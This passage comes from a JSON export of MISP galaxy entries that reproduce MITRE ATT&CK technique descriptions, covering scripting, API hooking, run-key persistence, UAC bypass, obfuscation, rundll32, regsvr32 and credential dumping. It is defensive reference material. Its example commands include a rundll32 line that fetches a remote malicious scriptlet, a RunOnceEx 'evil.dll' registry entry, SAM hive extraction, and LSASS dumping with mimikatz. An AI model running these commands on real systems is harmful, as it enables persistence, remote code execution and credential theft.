also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https:\/\/attack.mitre.org\/techniques\/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https:\/\/attack.mitre.org\/techniques\/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"7fd87010-3a00-4da3-b905-410525e8ec44","tag_id":"729","meta":{"external_id":["T1064"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:execution"],"mitre_data_sources":["Process monitoring","File monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1064","http:\/\/www.metasploit.com","https:\/\/www.veil-framework.com\/framework\/","https:\/\/github.com\/mattifestation\/PowerSploit","https:\/\/blog.crowdstrike.com\/deep-thought-chinese-targeting-national-security-think-tanks\/","https:\/\/www.uperesia.com\/analyzing-malicious-office-documents"]},"local":false},{"id":"1263","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Hooking - T1179","tag_name":"misp-galaxy:mitre-attack-pattern=\"Hooking - T1179\"","description":"Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. \n\nHooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process\u2019s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https:\/\/attack.mitre.org\/techniques\/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32\/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https:\/\/attack.mitre.org\/techniques\/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"66f73398-8394-4711-85e5-34c8540b22a5","tag_id":"733","meta":{"external_id":["T1179"],"kill_chain":["mitre-attack:persistence","mitre-attack:privilege-escalation","mitre-attack:credential-access"],"mitre_data_sources":["API monitoring","Binary file metadata","DLL monitoring","Loaded DLLs","Process monitoring","Windows event logs"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1179","https:\/\/msdn.microsoft.com\/library\/windows\/desktop\/ms644959.aspx","https:\/\/www.endgame.com\/blog\/technical-blog\/ten-process-injection-techniques-technical-survey-common-and-trending-process","https:\/\/www.adlice.com\/userland-rootkits-part-1-iat-hooks\/","https:\/\/www.mwrinfosecurity.com\/our-thinking\/dynamic-hooking-techniques-user-mode\/","https:\/\/www.exploit-db.com\/docs\/17802.pdf","https:\/\/www.symantec.com\/avcenter\/reference\/windows.rootkit.overview.pdf","https:\/\/volatility-labs.blogspot.com\/2012\/09\/movp-31-detecting-malware-hooks-in.html","https:\/\/github.com\/prekageo\/winhook","https:\/\/github.com\/jay\/gethooks","https:\/\/zairon.wordpress.com\/2006\/12\/06\/any-application-defined-hook-procedure-on-my-machine\/","https:\/\/eyeofrablog.wordpress.com\/2017\/06\/27\/windows-keylogger-part-2-defense-against-user-land\/","http:\/\/www.gmer.net\/","https:\/\/msdn.microsoft.com\/library\/windows\/desktop\/ms686701.aspx","https:\/\/security.stackexchange.com\/questions\/17904\/what-are-the-methods-to-find-hooked-functions-and-apis"]},"local":false},{"id":"796","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Registry Run Keys \/ Startup Folder - T1060","tag_name":"misp-galaxy:mitre-attack-pattern=\"Registry Run Keys \/ Startup Folder - T1060\"","description":"Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/code>\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce<\/code>\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/code>\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce<\/code>\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx<\/code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend \/v 1 \/d \"C:\\temp\\evil[.]dll\"<\/code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders<\/code>\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders<\/code>\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders<\/code>\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders<\/code>\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https:\/\/attack.mitre.org\/techniques\/T1036) to make the Registry entries look as if they are associated with legitimate programs.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"9422fc14-1c43-410d-ab0f-a709b76c72dc","tag_id":"767","meta":{"external_id":["CAPEC-270"],"kill_chain":["mitre-attack:persistence"],"mitre_data_sources":["Windows Registry","File monitoring"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1060","https:\/\/capec.mitre.org\/data\/definitions\/270.html","http:\/\/msdn.microsoft.com\/en-us\/library\/aa376977","https:\/\/support.microsoft.com\/help\/310593\/description-of-the-runonceex-registry-key","https:\/\/oddvar.moe\/2018\/03\/21\/persistence-using-runonceex-hidden-from-autoruns-exe\/","https:\/\/technet.microsoft.com\/en-us\/sysinternals\/bb963902"]},"local":false},{"id":"917","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Bypass User Account Control - T1088","tag_name":"misp-galaxy:mitre-attack-pattern=\"Bypass User Account Control - T1088\"","description":"Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe<\/code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be","tag_id":"731","meta":{"external_id":["T1088"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:privilege-escalation"],"mitre_data_sources":["System calls","Process monitoring","Authentication logs","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1088","http:\/\/www.pretentiousname.com\/misc\/win7_uac_whitelist2.html","https:\/\/technet.microsoft.com\/en-us\/itpro\/windows\/keep-secure\/how-user-account-control-works","http:\/\/pen-testing.sans.org\/blog\/pen-testing\/2013\/08\/08\/psexec-uac-bypass","https:\/\/technet.microsoft.com\/en-US\/magazine\/2009.07.uac.aspx","https:\/\/msdn.microsoft.com\/en-us\/library\/ms679687.aspx","https:\/\/github.com\/hfiref0x\/UACME","https:\/\/enigma0x3.net\/2016\/08\/15\/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\/","https:\/\/blog.fortinet.com\/2016\/12\/16\/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware","https:\/\/enigma0x3.net\/2017\/03\/14\/bypassing-uac-using-app-paths\/","https:\/\/enigma0x3.net\/2017\/03\/17\/fileless-uac-bypass-using-sdclt-exe\/"]},"local":false},{"id":"916","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Exploitation for Privilege Escalation - T1068","tag_name":"misp-galaxy:mitre-attack-pattern=\"Exploitation for Privilege Escalation - T1068\"","description":"Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform Privilege Escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"b21c3b2d-02e6-45b1-980b-e69051040839","tag_id":"768","meta":{"external_id":["CAPEC-69"],"kill_chain":["mitre-attack:privilege-escalation"],"mitre_data_sources":["Windows Error Reporting","Process monitoring","Application logs"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1068","https:\/\/capec.mitre.org\/data\/definitions\/69.html"]},"local":false},{"id":"1023","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Disabling Security Tools - T1089","tag_name":"misp-galaxy:mitre-attack-pattern=\"Disabling Security Tools - T1089\"","description":"Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"2e0dd10b-676d-4964-acd0-8a404c92b044","tag_id":"769","meta":{"external_id":["CAPEC-578"],"kill_chain":["mitre-attack:defense-evasion"],"mitre_data_sources":["API monitoring","File monitoring","Services","Windows Registry","Process command-line parameters","Anti-virus"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1089","https:\/\/capec.mitre.org\/data\/definitions\/578.html"]},"local":false},{"id":"918","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Exploitation for Defense Evasion - T1211","tag_name":"misp-galaxy:mitre-attack-pattern=\"Exploitation for Defense Evasion - T1211\"","description":"Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https:\/\/attack.mitre.org\/techniques\/T1063). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"fe926152-f431-4baf-956c-4ad3cb0bf23b","tag_id":"770","meta":{"external_id":["T1211"],"kill_chain":["mitre-attack:defense-evasion"],"mitre_data_sources":["Windows Error Reporting","Process monitoring","File monitoring"],"mitre_platforms":["Linux","Windows","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1211"]},"local":false},{"id":"902","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Obfuscated Files or Information - T1027","tag_name":"misp-galaxy:mitre-attack-pattern=\"Obfuscated Files or Information - T1027\"","description":"Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate\/Decode Files or Information](https:\/\/attack.mitre.org\/techniques\/T1140) for [User Execution](https:\/\/attack.mitre.org\/techniques\/T1204). The user may also be required to input a password to open a password protected compressed\/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux\/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command-Line Interface](https:\/\/attack.mitre.org\/techniques\/T1059). Environment variables, aliases, characters, and other platform\/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https:\/\/attack.mitre.org\/software\/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https:\/\/attack.mitre.org\/software\/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"b3d682b6-98f2-4fb0-aa3b-b4df007ca70a","tag_id":"771","meta":{"external_id":["T1027"],"kill_chain":["mitre-attack:defense-evasion"],"mitre_data_sources":["Network protocol analysis","Process use of network","File monitoring","Malware reverse engineering","Binary file metadata","Process command-line parameters","Environment variable","Process monitoring","Windows event logs","Network intrusion detection system","Email gateway","SSL\/TLS inspection"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1027","https:\/\/www.volexity.com\/blog\/2016\/11\/09\/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos\/","https:\/\/www.welivesecurity.com\/2013\/04\/26\/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole\/","https:\/\/www.carbonblack.com\/2016\/09\/23\/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks\/","https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/06\/obfuscation-in-the-wild.html","https:\/\/www.fireeye.com\/content\/dam\/fireeye-www\/blog\/pdfs\/revoke-obfuscation-report.pdf","https:\/\/researchcenter.paloaltonetworks.com\/2017\/03\/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks\/","https:\/\/en.wikipedia.org\/wiki\/Duqu","https:\/\/securingtomorrow.mcafee.com\/mcafee-labs\/malicious-document-targets-pyeongchang-olympics\/","https:\/\/github.com\/danielbohannon\/Revoke-Obfuscation","https:\/\/github.com\/itsreallynick\/office-crackros"]},"local":false},{"id":"1243","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Rundll32 - T1085","tag_name":"misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"","description":"The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL<\/code> and Control_RunDLLAsUser<\/code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]\/\/www[.]example[.]com\/malicious.sct\")\"<\/code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"62b8c999-dcc0-4755-bd69-09442d9359f5","tag_id":"772","meta":{"external_id":["T1085"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:execution"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters","Binary file metadata"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1085","https:\/\/www.trendmicro.de\/cloud-content\/us\/pdfs\/security-intelligence\/white-papers\/wp-cpl-malware.pdf","https:\/\/thisissecurity.stormshield.com\/2014\/08\/20\/poweliks-command-line-confusion\/"]},"local":false},{"id":"1252","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Regsvr32 - T1117","tag_name":"misp-galaxy:mitre-attack-pattern=\"Regsvr32 - T1117\"","description":"Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https:\/\/attack.mitre.org\/techniques\/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"68f7e3a1-f09f-4164-9a62-16b648a0dd5a","tag_id":"773","meta":{"external_id":["T1117"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:execution"],"mitre_data_sources":["Loaded DLLs","Process monitoring","Windows Registry","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1117","https:\/\/support.microsoft.com\/en-us\/kb\/249873","https:\/\/web.archive.org\/web\/20161128183535\/https:\/\/subt0x10.blogspot.com\/2016\/04\/bypass-application-whitelisting-script.html","https:\/\/www.carbonblack.com\/2016\/04\/28\/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land\/","https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/02\/spear_phishing_techn.html"]},"local":false},{"id":"1130","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Credential Dumping - T1003","tag_name":"misp-galaxy:mitre-attack-pattern=\"Credential Dumping - T1003\"","description":"Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform\u00a0Lateral Movement\u00a0and access restricted information.\n\nSeveral of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n\n### Windows\n\n#### SAM (Security Accounts Manager)\n\nThe SAM is a database file that contains local accounts for the host, typically those found with the \u2018net user\u2019 command. To enumerate the SAM database, system level access is required.\n\u00a0\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe \n* [gsecdump](https:\/\/attack.mitre.org\/software\/S0008)\n* [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with [Reg](https:\/\/attack.mitre.org\/software\/S0075):\n\n* reg save HKLM\\sam sam<\/code>\n* reg save HKLM\\system system<\/code>\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)\n\nNotes:\nRid 500 account is the local, in-built administrator.\nRid 501 is the guest account.\nUser accounts start with a RID of 1,000+.\n\n#### Cached Credentials\n\nThe DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.\n\u00a0\nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https:\/\/attack.mitre.org\/software\/S0008)\n* [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002)\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nCached credentials for Windows Vista are derived using PBKDF2.\n\n#### Local Security Authority (LSA) Secrets\n\nWith SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.\n\u00a0\nWhen services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.\n\u00a0\nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https:\/\/attack.mitre.org\/software\/S0008)\n* [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002)\n* secretsdump.py\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nThe passwords extracted by his mechanism are\u00a0UTF-16\u00a0encoded, which means that they are returned in\u00a0plaintext.\nWindows 10 adds protections for LSA Secrets described in Mitigation.\n\n#### NTDS from Domain Controller\n\nActive Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)\n \nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n\n#### Group Policy Preference (GPP) Files\n\nGroup Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.\n\nThese group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit\u2019s post exploitation module: \"post\/windows\/gather\/credentials\/gpp\"\n* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nNotes:\nOn the SYSVOL share, the following can be used to enumerate potential XML files.\ndir \/s * .xml\n\n#### Service Principal Names (SPNs)\n\nSee [Kerberoasting](https:\/\/attack.mitre.org\/techniques\/T1208).\n\n#### Plaintext Credentials\n\nAfter a user logs on to a system, a variety of credentials are generated and stored in the\u00a0Local Security Authority Subsystem Service\u00a0(LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.\n\nSSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs):\u00a0A Security Support Provider is a\u00a0dynamic-link library\u00a0(DLL) that makes one or more security packages available to applications.\n\nThe following SSPs can be used to access credentials:\n\nMsv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\nWdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)\nKerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\nCredSSP: \u00a0Provides SSO and\u00a0Network Level Authentication\u00a0for\u00a0Remote Desktop Services. (Citation: Microsoft CredSSP)\n\u00a0\nThe following tools can be used to enumerate credentials:\n\n* [Windows Credential Editor](https:\/\/attack.mitre.org\/software\/S0005)\n* [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002)\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump<\/code>\n\nLocally, mimikatz can be run:\n\n* sekurlsa::Minidump\u00a0lsassdump.dmp<\/code>\n* sekurlsa::logonPasswords<\/code>\n\n#### DCSync\n\nDCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https:\/\/attack.mitre.org\/techniques\/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https:\/\/attack.mitre.org\/techniques\/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the \"lsadump\" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)\n\n### Linux\n\n#### Proc filesystem\n\nThe \/proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https:\/\/attack.mitre.org\/software\/S0179), an open source tool inspired by [Mimikatz](https:\/\/attack.mitre.org\/software\/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22","tag_id":"734","meta":{"external_id":["CAPEC-567"],"kill_chain":["mitre-attack:credential-access"],"mitre_data_sources":["API monitoring","Process monitoring","PowerShell logs","Process command-line 